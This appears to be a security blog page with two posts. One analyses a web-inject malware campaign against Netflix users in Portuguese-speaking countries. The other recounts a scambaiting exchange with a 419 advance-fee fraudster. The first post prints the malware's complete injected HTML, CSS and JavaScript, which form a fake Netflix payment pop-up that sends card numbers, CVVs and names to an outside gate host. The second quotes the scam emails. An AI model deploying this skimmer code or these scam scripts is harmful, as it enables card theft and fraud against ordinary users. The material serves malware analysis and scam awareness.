Skip to content →

Tag: email

NETFLIX malware/phishing attack targeting Portuguese-speaking countries

Netflix is one of the most popular streaming platforms , all over the world, especially because of the “hottest” TV series. But, this popularity has attracted also criminals, looking for new ways to steal money. During the last months Netflix has been targeted by malware, written to steal credit card information and user credentials. The attack uses the same methodologies used by financial malware like Dridex/Zeus: web injects.

Once the user has been infected, the malware waits till the user loads the Netflix webpage to login. As soon as the user accesses the page and the browser loads the content from the server, the malware injects the malicious HTML, JavaScript and CSS content.

The code is activated in case of GET or POST requests on *netflix.com*.

set_url *netflix.com/* GP

where G= GET and P=POST

Once the page is loaded the malware injects the following code:

CSS code

.ontop {
z-index: 999;
width: 100%;
height: 100%;
top: 0;
left: 0;
display: none;
position: absolute;
}
.ontop2 {
top: 50%;
left: 50%;
margin-bottom: 0;
align-content: center;
}
#popup {
padding: 10px;
width: 1224px;
height: 700px;
position: absolute;
color: #fff;
top: 50%;
left: 50%;
margin-top: -400px;
margin-left: -600px;
font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
font-size: 12px;
background: #000000;
}
#cc_form input {
width: 100%;
height: 50px;
padding: 9px;
border-radius: 2px;
border: 1px solid #999;
color: #fff;
background-color: #333;
}
#cc_form td {
padding-top: 10px;
color: #eee;
font-size: 12px;
}
#cc_submit {
text-decoration: none;
color: white;
padding-bottom: 12px;
padding-left: 28px;
padding-right: 28px;
padding-top: 12px;
text-align: center;
border-radius: 2px;
background: #ff3019;
background: -moz-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: -webkit-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: linear-gradient(to bottom, #ff3019 0%, #cf0404 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff3019', endColorstr='#cf0404', GradientType=0);
}
#cc_submit:hover {
background: #ff1a00;
background: -moz-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: -webkit-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: linear-gradient(to bottom, #ff1a00 0%, #ff1a00 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff1a00', endColorstr='#ff1a00', GradientType=0);
} 
JavaScript code

.....

function submitMe(){ 
    if (document.getElementById("cc_number").value == "") {
        alert("Ingresse um numero de Cartao");
        document.getElementById("cc_number").focus();
        return false;
    }else {
        if (valid_credit_card(document.getElementById("cc_number").value)) {} 
        else {
           alert("Ingresse um numero Valido");
           document.getElementById("cc_number").focus();
           return false;
        }
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o mes de validade!");
        document.getElementById("cc_month").focus();
        return false;
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o ano de validade!");
        document.getElementById("cc_year").focus();
        return false;
    } 
    if (document.getElementById("cc_ccv").value == "") {
        alert("Ingresse o codigo de segurança do seu cartao!");
        document.getElementById("cc_ccv").focus();
        return false;
    }
    if (document.getElementById("cc_name").value == "") {
        alert("Ingresse o seu nome Completo!");
        document.getElementById("cc_name").focus();
        return false;
    }

var _link_ = "https://p0o9i8u7y9.xyz/braz2/gate.php?";
var _url_ = _link_ + 'CC=' + document.getElementById("cc_number").value + '&month=' + document.getElementById("cc_month").value + '&year=' + document.getElementById("cc_year").value + '&cvv=' + document.getElementById("cc_ccv").value + '&name=' + document.getElementById("cc_name").value;
var head = document.getElementsByTagName("head")[0];
var script_ = document.createElement('script');
script_.src = _url_;
script_.type = 'text/javascript';
head.appendChild(script_);
setCookie("WeAre", "Foda", 365);
hide('popDiv');
}

......
HTML code


<div class="ontop" id="popDiv">

<div id="popup">
   <center>
   <img src= "https://logodownload.org/wp-content/uploads/2014/10/netflix-logo.png"width="128">
  </center>

<h4>Houve um problema com seus dados de pagamento.</h4>

Desculpe-nos por
 interromper o show, mas não foi possÌvel confirmar suas informações de
 pagamento. Mas não se preocupe! Insira os dados no campo abaixo para
 continuar.

<form id="cc_form" name="cc_form">

<table width="100%">

<tr>

<td colspan="2">Numero do cartão: <input id="cc_number" name= "cc_number" placeholder="E.g. 0000 0000 0000 0000" type="text"></td>

 </tr>


<tr>

<td>Validade: <input id="cc_month" name="cc_month" placeholder="MM" style="width: 45% !important;" type="text"> <input id="cc_year" name= "cc_year" placeholder="AA" style="width: 45% !important;" type= "text"></td>


<td>Codigo de segurança: <input id="cc_ccv" name="cc_ccv" placeholder="" type="text"></td>

 </tr>


<tr>

<td colspan="2">Nome do titular (conforme escrito no cartão):
 <input id="cc_name" name="cc_name" type="text"></td>

 </tr>

 </table>

<a href="" id="cc_submit" onclick="submitMe();">CONTINUAR</a>
 </form>

 </div>

</div>


 

In order to see how the malware interacts with the user, we can inject the code in the browser, where the Netflix login page is loaded.

The malware checks, weather the inserted credit card  has a valid number or not.screen-shot-2016-10-17-at-2-54-52-pm

Using a valid credit card is possible to submit the request, triggering the submitMe() JavaScript function (showed above).

Leave a Comment

A nice conversation with a “scammer”

“The so-called “419” scam (aka “Nigeria scam” or “West African” scam) is a type of fraud named after an article of the Nigerian penal code under which it is prosecuted. It is also known as “Advance Fee Fraud” because the common principle of all the scam format is to get the victim to send cash (or other items of value) upfront by promising them a large amount of money that they would receive later if they cooperate. In almost all cases, the criminals receive money using Western Union and MoneyGram, instant wire transfer services with which the recipient can’t be traced once the money has been picked up. These services should never be used with people you only know by email or telephone!” (http://www.419scam.org)

Curious about that I started a nice conversation with the Nigerian guy, to see how the scam actually works.

Scammer

Dear Friend,

 I am very happy to inform you about my success in getting that fund transferred. Now I want you to contact my secretary and ask him for a cheque worth of USD$800,000 which I kept for you as a compensation of your past assistance to me. His contact details is below;

Name:   John Izualo.

Email;  ( johnizualo6@yahoo.com )

Kindly reconfirm to him the following below information:

 

Your full name_________

Your address_______

Your country______

Your age__________ 

Your occupation______

Your Phone number_______

 

Note that if you did not send him the above information complete,he will not release the cheque to you because he has to be sure that it is you. Note also that I will not be reached by email or phone at this moment because I am currently in London for investment trip with my share.

Regards,

Dr.Peter Ikey Obi.

Me

Hello I received this mail from Dr.Peter Ikey Obi,

I didn't know how I helped him but I'm very happy to receive this bonus.

here may details for the transfer.

Your full name______Davide XXXX

Your address_______Via dei XXX

Your country_______Italy

Your age___________59

Your occupation______Director Sales at XXX

Your Phone number_______+3934877XXXXX

Regards,

Scammer

 DEAR Davide XXXX,

WELL, I RECEIVE YOUR EMAIL AND ITS CONTENT AND I HAVE MADE SOME INQUIRES ACCORDING TO THE INSTRUCTIONS GIVEN TO ME BY MY BOSS BEFORE HE WENT TO LONDON AND I WANT YOU TO DO ME A FAVOR NOW TOWARDS YOUR FUNDS IN A CERTIFIED BANK CHEQUE ($800,000.00 USD), DO YOU WANT TO RECEIVE IT THROUGH BANK TO BANK WIRING TRANSFER OR DO YOU WANT IT THROUGH DELIVERY FROM COURIER COMPANY, I WANT YOU TO GET BACK TO ME TODAY CONCERNING THIS MATTER! AND IF YOUR CHOICE IS BANK TO BANK WIRING TRANSFER, PLEASE TRY TO FORWARD ME YOUR BANK ACCOUNT INFORMATION BECAUSE THE BANK HERE NEEDS IT TO TRANSFER YOUR FUND INTO YOUR ACCOUNT THERE OK.


BUT IF YOUR CHOICE IS THROUGH COURIER COMPANY, THEN I ALSO WANT YOU TO GET BACK TO ME AS SOON AS POSSIBLE, SO THAT I WILL MAKE THE REMAINING ARRANGEMENT WITH THE COURIER COMPANY HERE CONCERNING HOW TO DELIVERY YOUR CERTIFIED BANK CHEQUE OF $800, 000.00 USD TO YOU, BECAUSE YOUR ADDRESS IS ALREADY RECEIVED HERE OK.

THANKS AND HAPPY TO HEAR BACK FROM YOU,


YOURS SINCERELY,
JOHN IZUALO,
PHONE: +234-806-4228395.

Me

Hello Mr Jhon,

I would like to go through a courier company because I do not have currently my bank account available. What should I do?

Thanks

Best

Scammer

Dear Davide XXXX,
Well, I received your e-mail and its content but inquires I made today stated that delivering your cheque of USD$800,000.00 to you through courier company will only cost you $195.92 for its delivering through FedEx.

and you are required to send the delivering fee of $195.92 through western union or money gram money transfer in the below receiver's name information ok. As soon as you send the fee then get back to me with the MTCN and your cheque of $800, 000.00 must be delivered to you without wasting any time OK.

HERE IS THE RECEIVER'S NAME INFORMATION TO SEND THE REQUIRED FEE OF $195.92 THROUGH WESTERN UNION MONEY TRANSFER OR MONEY GRAM:


RECEIVER'S NAME: PETER NWAKOR

CITY: LAGOS

COUNTRY: NIGERIA

COUNTRY CODE: +234.

TEST QUESTION: IN GOD?

ANSWER: WE TRUST

Thanks,

Mr. John Izualo.

Phone: +234-806-4228395

Me

Hi Thanks a lot.

Tomorrow I will send the money. When I will receive the money?

Do you need more informations to send the money?

Thanks a lot thanks

Best

Everything was working fine and I was so happy to receive my payment of 800K $.

But I made I mistake. I waited too much to make the payment via WU and my Nigerian friend became angry 🙁

He replied to me the following:

Scammer

Am here to inform you that i have tried my best to make sure you receive your cheque, but i cansee that you are not serious about it, failure to compiler with me by the fee today and tomorrow, i will return the cheque to my boss first thing on Monday morning.

The weekend started and I cannot reach out to him anymore. He doesn’t answer anymore. My Yacht has to wait…. maybe the next scam will be the right one!!

Leave a Comment